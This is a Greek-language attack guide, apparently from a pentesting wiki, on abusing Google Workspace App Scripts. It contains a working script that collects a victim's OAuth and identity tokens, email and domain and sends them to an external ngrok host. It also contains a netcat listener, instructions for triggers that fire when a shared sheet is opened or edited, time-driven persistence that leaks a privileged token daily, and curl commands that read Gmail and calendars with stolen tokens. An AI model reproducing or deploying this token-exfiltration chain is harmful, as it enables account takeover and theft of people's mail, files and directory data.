GWS - App Scripts

App Scripts

App Scripts είναι κώδικας που θα ενεργοποιηθεί όταν ένας χρήστης με δικαιώματα επεξεργασίας αποκτήσει πρόσβαση στο έγγραφο με το οποίο είναι συνδεδεμένο το App Script και μετά από την αποδοχή του OAuth prompt. Μπορούν επίσης να ρυθμιστούν ώστε να εκτελούνται κάθε συγκεκριμένο χρονικό διάστημα από τον κάτοχο του App Script (Persistence).

Create App Script

Υπάρχουν αρκετοί τρόποι για να δημιουργήσετε ένα App Script, αν και οι πιο συνηθισμένοι είναι από ένα Google Document (οποιουδήποτε τύπου) και ως αυτόνομο έργο:

App Script Scenario

Create Google Sheet with App Script

Ξεκινήστε δημιουργώντας ένα App Script, η σύστασή μου για αυτό το σενάριο είναι να δημιουργήσετε ένα Google Sheet και να μεταβείτε στο Extensions > App Scripts, αυτό θα ανοίξει ένα νέο App Script για εσάς συνδεδεμένο με το φύλλο.

Leak token

Για να δώσετε πρόσβαση στο OAuth token πρέπει να κάνετε κλικ στο Services + και να προσθέσετε scopes όπως:

• AdminDirectory: Πρόσβαση σε χρήστες και ομάδες του καταλόγου (αν ο χρήστης έχει αρκετά δικαιώματα)

• Gmail: Για πρόσβαση σε δεδομένα gmail

• Drive: Για πρόσβαση σε δεδομένα drive

• Google Sheets API: Έτσι ώστε να λειτουργεί με το trigger

Για να αλλάξετε εσείς τους απαραίτητους scopes μπορείτε να μεταβείτε στις ρυθμίσεις του έργου και να ενεργοποιήσετε: Show "appsscript.json" manifest file in editor.

function getToken() {
var userEmail = Session.getActiveUser().getEmail();
var domain = userEmail.substring(userEmail.lastIndexOf("@") + 1);
var oauthToken = ScriptApp.getOAuthToken();
var identityToken = ScriptApp.getIdentityToken();

// Data json
data = {
"oauthToken": oauthToken,
"identityToken": identityToken,
"email": userEmail,
"domain": domain
}

// Send data
makePostRequest(data);

// Use the APIs, if you don't even if the have configured them in appscript.json the App script won't ask for permissions

// To ask for AdminDirectory permissions
var pageToken = "";
page = AdminDirectory.Users.list({
domain: domain,  // Use the extracted domain
orderBy: 'givenName',
maxResults: 100,
pageToken: pageToken
});

// To ask for gmail permissions
var threads = GmailApp.getInboxThreads(0, 10);

// To ask for drive permissions
var files = DriveApp.getFiles();
}


function makePostRequest(data) {
var url = 'http://5.tcp.eu.ngrok.io:12027';

var options = {
'method' : 'post',
'contentType': 'application/json',
'payload' : JSON.stringify(data)
};

try {
UrlFetchApp.fetch(url, options);
} catch (e) {
Logger.log("Error making POST request: " + e.toString());
}
}

Για να καταγράψετε το αίτημα μπορείτε απλά να εκτελέσετε:

ngrok tcp 4444
nc -lv 4444 #macOS

Permissions requested to execute the App Script:

Create Trigger

Μόλις διαβαστεί η εφαρμογή, κάντε κλικ στο ⏰ Triggers για να δημιουργήσετε έναν trigger. Ως function για εκτέλεση επιλέξτε getToken, εκτελείται κατά την ανάπτυξη Head, στην πηγή γεγονότος επιλέξτε From spreadsheet και τύπο γεγονότος επιλέξτε On open ή On edit (ανάλογα με τις ανάγκες σας) και αποθηκεύστε.

Σημειώστε ότι μπορείτε να ελέγξετε τις εκτελέσεις των App Scripts στην καρτέλα Εκτελέσεις αν θέλετε να αποσφαλίσετε κάτι.

Sharing

Για να trigger το App Script το θύμα πρέπει να συνδεθεί με Editor Access.

Abusing Shared With Me documents

Copying instead of sharing

Όταν δημιουργείτε έναν σύνδεσμο για να μοιραστείτε ένα έγγραφο, δημιουργείται ένας σύνδεσμος παρόμοιος με αυτόν: https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit Αν αλλάξετε το τέλος "/edit" σε "/copy", αντί να έχετε πρόσβαση σε αυτό, η Google θα σας ρωτήσει αν θέλετε να δημιουργήσετε ένα αντίγραφο του εγγράφου:

Αν ο χρήστης το αντιγράψει και το αποκτήσει, τόσο το περιεχόμενο του εγγράφου όσο και τα App Scripts θα αντιγραφούν, ωστόσο οι triggers δεν είναι, επομένως τίποτα δεν θα εκτελείται.

Sharing as Web Application

Σημειώστε ότι είναι επίσης δυνατό να μοιραστείτε ένα App Script ως Web application (στον Editor του App Script, αναπτύξτε ως Web application), αλλά θα εμφανιστεί μια ειδοποίηση όπως αυτή:

Ακολουθούμενη από το τυπικό OAuth prompt που ζητά τις απαραίτητες άδειες.

Testing

Μπορείτε να δοκιμάσετε ένα συγκεντρωμένο token για να καταγράψετε emails με:

curl -X GET "https://www.googleapis.com/gmail/v1/users/<user@email>/messages" \
-H "Authorization: Bearer <token>"

Λίστα ημερολογίου του χρήστη:

curl -H "Authorization: Bearer $OAUTH_TOKEN" \
-H "Accept: application/json" \
"https://www.googleapis.com/calendar/v3/users/me/calendarList"

App Script ως Επιμονή

Μία επιλογή για επιμονή θα ήταν να δημιουργήσετε ένα έγγραφο και να προσθέσετε έναν ενεργοποιητή για τη συνάρτηση getToken και να μοιραστείτε το έγγραφο με τον επιτιθέμενο, έτσι ώστε κάθε φορά που ο επιτιθέμενος ανοίγει το αρχείο να εξάγει το token του θύματος.

Είναι επίσης δυνατό να δημιουργήσετε ένα App Script και να το κάνετε να ενεργοποιείται κάθε X χρόνο (όπως κάθε λεπτό, ώρα, ημέρα...). Ένας επιτιθέμενος που έχει συμβιβασμένα διαπιστευτήρια ή μια συνεδρία ενός θύματος θα μπορούσε να ρυθμίσει έναν χρονικό ενεργοποιητή App Script και να διαρρεύσει ένα πολύ προνομιούχο OAuth token κάθε μέρα:

Απλά δημιουργήστε ένα App Script, πηγαίνετε στους Ενεργοποιητές, κάντε κλικ στην Προσθήκη Ενεργοποιητή και επιλέξτε ως πηγή γεγονότος Χρονικά καθοδηγούμενη και επιλέξτε τις επιλογές που σας ταιριάζουν καλύτερα:

Παράκαμψη Μη Επαληθευμένου Προτροπής Κοινού Εγγράφου

Επιπλέον, αν κάποιος σας μοιράστηκε ένα έγγραφο με πρόσβαση επεξεργασίας, μπορείτε να δημιουργήσετε App Scripts μέσα στο έγγραφο και ο ΙΔΙΟΚΤΗΤΗΣ (δημιουργός) του εγγράφου θα είναι ο ιδιοκτήτης του App Script.